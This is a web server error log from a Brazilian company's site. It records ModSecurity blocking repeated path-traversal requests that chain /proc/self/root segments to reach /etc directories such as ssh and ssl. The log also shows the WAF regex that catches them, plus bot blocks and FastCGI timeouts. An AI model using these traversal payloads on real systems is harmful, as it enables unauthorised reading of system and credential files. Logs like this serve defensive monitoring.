[Tue Mar 17 22:37:37.468133 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:50590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB4eoXxyEfFpUF8f8OEAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:39.375608 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:43900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB4xj0p0SRWAqcjGGrCgAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:40.842565 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:43904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB5Bj0p0SRWAqcjGGrCwAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:42.961194 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:43920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB5gkwaGbbGflqUZC0qgAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:51.562421 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:37:53.202277 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:59006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB8SmAPhZkrhU8w4kSigAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:54.607866 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:59016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB8ta6ubjKNq_cu4Y3TgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:56.737299 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:59024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB9OyqAr6etmhZHNpXkwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:58.175312 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:36806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB9ta6ubjKNq_cu4Y3TwAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:37:59.619273 2026] [:error] [pid 16560:tid 140411666392832] [client 74.7.241.31:36812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB966gUSg3B_dEMdIYRgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:38:01.121203 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:36816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB-Yh-PF_25v4hFRCckgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:38:01.568863 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:57656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB-cdf6f5d65gmYZRw7QAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:38:03.578481 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:36822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB--yqAr6etmhZHNpXlAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:38:05.077458 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:36832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboB_cdf6f5d65gmYZRw7wAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:38:14.038306 2026] [proxy_fcgi:error] [pid 25836:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:38:38.133874 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54634] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:38:41.118942 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.244.43:38124] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboCIeyqAr6etmhZHNpXnAAAAEU"]
[Tue Mar 17 22:39:00.152638 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54960] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:39:22.129823 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:39:26.121066 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:54212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboCTsdf6f5d65gmYZRxGQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:39:32.663957 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.228.61:45162] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboCVOyqAr6etmhZHNpXsQAAAEw"]
[Tue Mar 17 22:39:44.213827 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55566] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:40:03.646769 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:57490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboCc8df6f5d65gmYZRxKwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:40:07.526353 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:40:29.123816 2026] [proxy_fcgi:error] [pid 18211:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:40:30.677474 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:57490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboCjsdf6f5d65gmYZRxOQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:40:51.118335 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56344] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:41:13.125806 2026] [proxy_fcgi:error] [pid 16560:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56576] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:41:34.121320 2026] [proxy_fcgi:error] [pid 31803:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56816] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:41:56.125853 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57148] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:42:18.153788 2026] [proxy_fcgi:error] [pid 16560:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:42:41.057844 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:42:42.277557 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:37210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboDEimAPhZkrhU8w4kTEwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:43:04.129795 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:43:17.731906 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:57598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboDNdY0UrI5A3LftIwwcgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:43:26.130153 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58314] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:43:26.588503 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:53872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboDPuw_le52K8_3pV1-XAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:43:47.071959 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58612] AH01075: Error dispatching request to : (polling)
